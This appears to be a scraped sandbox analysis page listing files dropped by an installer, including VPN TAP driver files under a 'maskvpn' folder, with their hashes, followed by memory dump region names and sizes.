12KB

MD5
7cee19d7e00e9a35fc5e7884fd9d1ad8

SHA1
2c5e8de13bdb6ddc290a9596113f77129ecd26bc

SHA256
58ee49d4b4f6def91c6561fc5a1b73bc86d8a01b23ce0c8ddbf0ed11f13d5ace

SHA512
a6955f5aff467f199236ed8a57f4d97af915a3ae81711ff8292e66e66c9f7ee307d7d7aafce09a1bd33c8f7983694cb207fc980d6c3323b475de6278d37bdde8

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-TAH8H.tmp\_isdecmp.dll
Filesize
12KB

MD5
7cee19d7e00e9a35fc5e7884fd9d1ad8

SHA1
2c5e8de13bdb6ddc290a9596113f77129ecd26bc

SHA256
58ee49d4b4f6def91c6561fc5a1b73bc86d8a01b23ce0c8ddbf0ed11f13d5ace

SHA512
a6955f5aff467f199236ed8a57f4d97af915a3ae81711ff8292e66e66c9f7ee307d7d7aafce09a1bd33c8f7983694cb207fc980d6c3323b475de6278d37bdde8

Download Submit
C:\Users\Admin\AppData\Local\Temp\{1A1EE~1\tap0901.cat
Filesize
19KB

MD5
c757503bc0c5a6679e07fe15b93324d6

SHA1
6a81aa87e4b07c7fea176c8adf1b27ddcdd44573

SHA256
91ebea8ad199e97832cf91ea77328ed7ff49a1b5c06ddaacb0e420097a9b079e

SHA512
efd1507bc7aa0cd335b0e82cddde5f75c4d1e35490608d32f24a2bed0d0fbcac88919728e3b3312665bd1e60d3f13a325bdcef4acfddab0f8c2d9f4fb2454d99

Download Submit
C:\Users\Admin\AppData\Local\Temp\{1A1EE~1\tap0901.sys
Filesize
26KB

MD5
d765f43cbea72d14c04af3d2b9c8e54b

SHA1
daebe266073616e5fc931c319470fcf42a06867a

SHA256
89c5ca1440df186497ce158eb71c0c6bf570a75b6bc1880eac7c87a0250201c0

SHA512
ff83225ed348aa8558fb3055ceb43863bad5cf775e410ed8acda7316b56cd5c9360e63ed71abbc8929f7dcf51fd9a948b16d58242a7a2b16108e696c11d548b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\{1a1ee158-7bb2-5040-8c04-15dde7f91936}\oemvista.inf
Filesize
7KB

MD5
87868193626dc756d10885f46d76f42e

SHA1
94a5ce8ed7633ed77531b6cb14ceb1927c5cae1f

SHA256
b5728e42ea12c67577cb9188b472005ee74399b6ac976e7f72b48409baee3b41

SHA512
79751330bed5c16d66baf3e5212be0950f312ffd5b80b78be66eaea3cc7115f8a9472d2a43b5ce702aa044f3b45fd572775ff86572150df91cc27866f88f8277

Download Submit
C:\Windows\INF\oem2.inf
Filesize
7KB

MD5
87868193626dc756d10885f46d76f42e

SHA1
94a5ce8ed7633ed77531b6cb14ceb1927c5cae1f

SHA256
b5728e42ea12c67577cb9188b472005ee74399b6ac976e7f72b48409baee3b41

SHA512
79751330bed5c16d66baf3e5212be0950f312ffd5b80b78be66eaea3cc7115f8a9472d2a43b5ce702aa044f3b45fd572775ff86572150df91cc27866f88f8277

Download Submit
C:\Windows\System32\DriverStore\FileRepository\OEMVIS~1.INF\tap0901.sys
Filesize
26KB

MD5
d765f43cbea72d14c04af3d2b9c8e54b

SHA1
daebe266073616e5fc931c319470fcf42a06867a

SHA256
89c5ca1440df186497ce158eb71c0c6bf570a75b6bc1880eac7c87a0250201c0

SHA512
ff83225ed348aa8558fb3055ceb43863bad5cf775e410ed8acda7316b56cd5c9360e63ed71abbc8929f7dcf51fd9a948b16d58242a7a2b16108e696c11d548b2

Download Submit
C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf
Filesize
7KB

MD5
87868193626dc756d10885f46d76f42e

SHA1
94a5ce8ed7633ed77531b6cb14ceb1927c5cae1f

SHA256
b5728e42ea12c67577cb9188b472005ee74399b6ac976e7f72b48409baee3b41

SHA512
79751330bed5c16d66baf3e5212be0950f312ffd5b80b78be66eaea3cc7115f8a9472d2a43b5ce702aa044f3b45fd572775ff86572150df91cc27866f88f8277

Download Submit
\??\c:\PROGRA~2\maskvpn\driver\win764\tap0901.sys
Filesize
26KB

MD5
d765f43cbea72d14c04af3d2b9c8e54b

SHA1
daebe266073616e5fc931c319470fcf42a06867a

SHA256
89c5ca1440df186497ce158eb71c0c6bf570a75b6bc1880eac7c87a0250201c0

SHA512
ff83225ed348aa8558fb3055ceb43863bad5cf775e410ed8acda7316b56cd5c9360e63ed71abbc8929f7dcf51fd9a948b16d58242a7a2b16108e696c11d548b2

Download Submit
\??\c:\program files (x86)\maskvpn\driver\win764\tap0901.cat
Filesize
19KB

MD5
c757503bc0c5a6679e07fe15b93324d6

SHA1
6a81aa87e4b07c7fea176c8adf1b27ddcdd44573

SHA256
91ebea8ad199e97832cf91ea77328ed7ff49a1b5c06ddaacb0e420097a9b079e

SHA512
efd1507bc7aa0cd335b0e82cddde5f75c4d1e35490608d32f24a2bed0d0fbcac88919728e3b3312665bd1e60d3f13a325bdcef4acfddab0f8c2d9f4fb2454d99

Download Submit
\??\pipe\LOCAL\crashpad_1544_IMIUUEICRTTRLDML
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/60-153-0x0000000000000000-mapping.dmp

Download
memory/60-286-0x0000000000000000-mapping.dmp

Download
memory/400-162-0x0000000000000000-mapping.dmp

Download
memory/508-262-0x0000000000000000-mapping.dmp

Download
memory/612-269-0x0000000000000000-mapping.dmp

Download
memory/1060-145-0x0000000000000000-mapping.dmp

Download
memory/1060-148-0x0000000000400000-0x000000000188E000-memory.dmp

Filesize
20.6MB

Download
memory/1236-188-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1236-203-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1236-184-0x0000000000000000-mapping.dmp

Download
memory/1364-238-0x00000000073E0000-0x00000000076C0000-memory.dmp

Filesize
2.9MB

Download
memory/1364-247-0x000000000A640000-0x000000000A655000-memory.dmp

Filesize
84KB

Download
memory/1364-234-0x0000000000000000-mapping.dmp

Download
memory/1364-244-0x000000000A2A0000-0x000000000A2AF000-memory.dmp

Filesize
60KB

Download
memory/1544-149-0x0000000000000000-mapping.dmp

Download
memory/1624-132-0x0000000000000000-mapping.dmp

Download
memory/1624-137-0x00000000023B1000-0x00000000023B3000-memory.dmp

Filesize
8KB

Download
memory/1856-139-0x0000000000000000-mapping.dmp

Download
memory/1964-283-0x0000000000400000-0x00000000015D7000-memory.dmp

Filesize
17.8MB

Download
memory/1964-280-0x0000000000000000-mapping.dmp

Download
memory/1980-144-0x0000000000000000-mapping.dmp

Download
memory/2132-285-0x0000000000000000-mapping.dmp

Download
memory/2304-152-0x0000000000000000-mapping.dmp

Download
memory/2940-174-0x0000000000000000-mapping.dmp

Download
memory/2940-169-0x0000000000000000-mapping.dmp

Download
memory/2940-180-0x0000000000400000-0x00000000010FE000-memory.dmp

Filesize
13.0MB

Download
memory/2940-202-0x0000000000400000-0x00000000010FE000-memory.dmp

Filesize
13.0MB

Download
memory/3008-207-0x0000000000F10000-0x000000000158C000-memory.dmp

Filesize
6.5MB

Download
memory/3008-186-0x0000000000000000-mapping.dmp

Download
memory/3008-204-0x0000000002E30000-0x0000000002E42000-memory.dmp

Filesize
72KB

Download
memory/3008-196-0x0000000002E30000-0x0000000002E42000-memory.dmp

Filesize
72KB

Download
memory/3008-208-0x0000000000F10000-0x000000000158C000-memory.dmp

Filesize
6.5MB

Download
memory/3736-160-0x0000000000000000-mapping.dmp

Download
memory/3820-170-0x0000000000000000-mapping.dmp

Download
memory/3948-274-0x00007FFF8F040000-0x00007FFF8FB01000-memory.dmp

Filesize
10.8MB

Download
memory/3948-279-0x000001A255160000-0x000001A255182000-memory.dmp

Filesize
136KB

Download
memory/3960-172-0x0000000000000000-mapping.dmp

Download
memory/3972-131-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/3972-130-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/3980-158-0x0000000000000000-mapping.dmp

Download
memory/4060-164-0x0000000000000000-mapping.dmp

Download
memory/4124-156-0x0000000000000000-mapping.dmp

Download
memory/4304-229-0x0000000000000000-mapping.dmp

Download
memory/4304-273-0x0000000000400000-0x000000000044C000-memory.dmp

Filesize
304KB

Download
memory/4304-231-0x0000000000400000-0x000000000044C000-memory.dmp

Filesize
304KB

Download
memory/4352-177-0x0000000000400000-0x00000000004CC000-memory.dmp

Filesize
816KB

Download
memory/4352-195-0x0000000000400000-0x00000000004CC000-memory.dmp

Filesize
816KB

Download
memory/4352-173-0x0000000000000000-mapping.dmp

Download
memory/4572-181-0x0000000000000000-mapping.dmp

Download
memory/4668-166-0x0000000000000000-mapping.dmp

Download
memory/4672-140-0x0000000000000000-mapping.dmp

Download
memory/4672-143-0x0000000000400000-0x000000000188E000-memory.dmp

Filesize
20.6MB

Download
memory/4672-142-0x0000000000400000-0x000000000188E000-memory.dmp

Filesize
20.6MB

Download
memory/4748-168-0x0000000000000000-mapping.dmp

Download
memory/5000-150-0x0000000000000000-mapping.dmp

Download
memory/5052-276-0x0000000000000000-mapping.dmp

Download
memory/5100-228-0x0000000000000000-mapping.dmp

Download
memory/5144-191-0x0000000000000000-mapping.dmp

Download
memory/5276-201-0x0000000000000000-mapping.dmp

Download
memory/5276-209-0x0000000000400000-0x0000000001406000-memory.dmp

Filesize
16.0MB

Download
memory/5276-213-0x0000000000400000-0x0000000001406000-memory.dmp

Filesize
16.0MB

Download
memory/5316-287-0x0000000000000000-mapping.dmp

Download
memory/5400-214-0x0000000010000000-0x0000000010F3D000-memory.dmp

Filesize
15.2MB

Download
memory/5400-210-0x0000000000000000-mapping.dmp

Download
memory/5620-289-0x0000000000400000-0x00000000015D7000-memory.dmp

Filesize
17.8MB

Download
memory/5620-288-0x0000000000000000-mapping.dmp

Download
memory/5624-217-0x0000000000000000-mapping.dmp

Download
memory/5636-218-0x0000000000000000-mapping.dmp

Download
memory/5732-219-0x0000000000000000-mapping.dmp

Download
memory/5732-257-0x0000000000000000-mapping.dmp

Download
memory/5764-220-0x0000000000000000-mapping.dmp

Download
memory/5792-221-0x0000000000000000-mapping.dmp

Download
memory/5812-259-0x0000000000000000-mapping.dmp

Download
memory/5844-264-0x0000000000000000-mapping.dmp

Download
memory/5876-222-0x0000000000000000-mapping.dmp

Download
memory/5896-223-0x0000000000000000-mapping.dmp

Download
memory/5928-224-0x0000000000000000-mapping.dmp

Download
memory/5940-225-0x0000000000000000-mapping.dmp

Download
memory/5960-291-0x0000000000400000-0x00000000015D7000-memory.dmp

Filesize
17.8MB

Download
memory/5960-293-0x0000000033D20000-0x0000000033EE6000-memory.dmp

Filesize
1.8MB

Download
memory/5960-294-0x0000000000400000-0x00000000015D7000-memory.dmp

Filesize
17.8MB

Download
memory/5960-295-0x0000000034480000-0x00000000345D8000-memory.dmp

Filesize
1.3MB

Download
memory/5960-297-0x0000000034610000-0x0000000034668000-memory.dmp

Filesize
352KB

Download
memory/5984-226-0x0000000000000000-mapping.dmp

Download
memory/6108-227-0x0000000000000000-mapping.dmp

Download